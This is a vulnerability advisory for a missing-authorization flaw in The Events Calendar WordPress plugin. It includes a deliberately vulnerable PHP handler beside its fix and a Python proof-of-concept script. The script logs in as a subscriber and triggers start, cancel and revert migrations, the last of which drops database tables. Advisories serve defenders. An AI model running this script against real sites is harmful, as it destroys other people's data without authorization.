Security Vulnerability Report

CVE-2025-15043

Published: 2026-01-20 15:16:15
Last Modified: 2026-04-15 00:35:42

Description

The "The Events Calendar" plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the 'start_migration', 'cancel_migration', and 'revert_migration' functions in all versions up to, and including, 6.15.13. This makes it possible for authenticated attackers, with subscriber level access and above, to start, cancel, or revert the Custom Tables V1 database migration, including dropping the custom database tables entirely via the revert action.
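The missing authorization described above, shown as an added illustration that is not The Events Calendar's code: a hypothetical WordPress admin-ajax handler in its vulnerable shape beside the hardened form that adds the nonce and capability checks before any side effect. The handler, hook, nonce action and helper names are assumptions made for this example.

```php
<?php
/*
 * Illustrative WordPress admin-ajax handler written for this report; it is not
 * The Events Calendar's code, and every name below is hypothetical.
 * wp_ajax_* hooks fire for any logged-in user, so a handler that performs a
 * privileged operation without its own capability check is reachable by a
 * subscriber. That is the CWE-862 pattern behind this CVE.
 */

// Stand-in for the destructive migration step (hypothetical table name).
function hypothetical_revert_custom_tables() {
    global $wpdb;
    $wpdb->query( "DROP TABLE IF EXISTS {$wpdb->prefix}hypothetical_custom_events" );
}

// Vulnerable shape: any authenticated user can trigger the revert.
function hypothetical_revert_migration_vulnerable() {
    hypothetical_revert_custom_tables();
    wp_send_json_success( array( 'reverted' => true ) );
}

// Hardened shape: verify the request is intentional (nonce) and authorized
// (capability) before touching the database.
function hypothetical_revert_migration_hardened() {
    // Dies with a 403 when the nonce for this specific action is missing or stale.
    check_ajax_referer( 'hypothetical_migration_nonce', 'nonce' );

    // Only users who may manage the site are allowed to control the migration.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions' ), 403 );
    }

    hypothetical_revert_custom_tables();
    wp_send_json_success( array( 'reverted' => true ) );
}

// Register only the hardened handler; the vulnerable one is shown for contrast.
add_action( 'wp_ajax_hypothetical_revert_migration', 'hypothetical_revert_migration_hardened' );
```

Because the nonce check alone does not establish authorization (every logged-in user can obtain a nonce), the capability check is the control that actually closes the hole.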

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
Weakness: CWE-862 (Missing Authorization)

Configurations (Affected Products)


The Events Calendar < 6.15.13.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-15043 PoC - The Events Calendar Plugin Unauthorized Migration Control

Note: This PoC is for educational and authorized testing purposes only.
"""
import re
import sys

import requests

TARGET_URL = "https://vulnerable-site.com/wp-admin/admin-ajax.php"
USERNAME = "attacker"
PASSWORD = "password"


def get_wordpress_nonce(session, url):
    """Attempt to get a valid nonce from the target site"""
    response = session.get(
        f"{url.replace('/admin-ajax.php', '')}/wp-admin/admin.php?page=tribe-common"
    )
    if 'nonce' in response.text:
        nonce_match = re.search(r'nonce":"([a-z0-9]+)"', response.text)
        if nonce_match:
            return nonce_match.group(1)
    return None


def exploit_migration(session, action, nonce=None):
    """Send migration control request"""
    data = {
        'action': action,
        'tribe_attachment': '1',
        '_wpnonce': nonce or ''
    }
    if nonce:
        data['_wp_http_referer'] = '/wp-admin/admin.php?page=tribe-common'
    response = session.post(TARGET_URL, data=data)
    return response


def main():
    session = requests.Session()

    # Step 1: Authenticate
    print("[*] Authenticating to WordPress...")
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        'testcookie': '1'
    }
    response = session.post(
        f"{TARGET_URL.replace('/admin-ajax.php', '/wp-login.php')}",
        data=login_data
    )
    if 'wordpress_logged_in' not in session.cookies:
        print("[-] Authentication failed")
        sys.exit(1)
    print("[+] Authentication successful")

    # Step 2: Try to get nonce (optional in some configurations)
    nonce = get_wordpress_nonce(session, TARGET_URL)
    if nonce:
        print(f"[+] Obtained nonce: {nonce[:10]}...")

    # Step 3: Execute migration operations
    actions = [
        ('tribe_start_migration', 'Start Migration'),
        ('tribe_cancel_migration', 'Cancel Migration'),
        ('tribe_revert_migration', 'REVERT MIGRATION (DANGEROUS)')
    ]
    for action, description in actions:
        print(f"\n[*] Executing: {description}")
        response = exploit_migration(session, action, nonce)
        print(f"[*] Status: {response.status_code}")
        print(f"[*] Response: {response.text[:200]}")


if __name__ == "__main__":
    main()
```

References

https://plugins.trac.wordpress.org/changeset?old_path=/the-events-calendar/tags/6.15.13&new_path=/the-events-calendar/tags/6.15.13.1
https://www.wordfence.com/threat-intel/vulnerabilities/id/346a5b00-fb76-4413-a935-a2df4dc51984?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-15043",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-20T15:16:15.350",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The The Events Calendar plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the 'start_migration', 'cancel_migration', and 'revert_migration' functions in all versions up to, and including, 6.15.13. This makes it possible for authenticated attackers, with subscriber level access and above, to start, cancel, or revert the Custom Tables V1 database migration, including dropping the custom database tables entirely via the revert action."
      },
      {
        "lang": "es",
        "value": "El plugin The Events Calendar para WordPress es vulnerable a acceso no autorizado debido a una comprobación de capacidad faltante en las funciones 'start_migration', 'cancel_migration' y 'revert_migration' en todas las versiones hasta la 6.15.13, inclusive. Esto hace posible que atacantes autenticados, con acceso de nivel de suscriptor y superior, inicien, cancelen o reviertan la migración de la base de datos Custom Tables V1, incluyendo la eliminación completa de las tablas de base de datos personalizadas a través de la acción de reversión."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          { "lang": "en", "value": "CWE-862" }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/changeset?old_path=/the-events-calendar/tags/6.15.13&new_path=/the-events-calendar/tags/6.15.13.1",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/346a5b00-fb76-4413-a935-a2df4dc51984?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```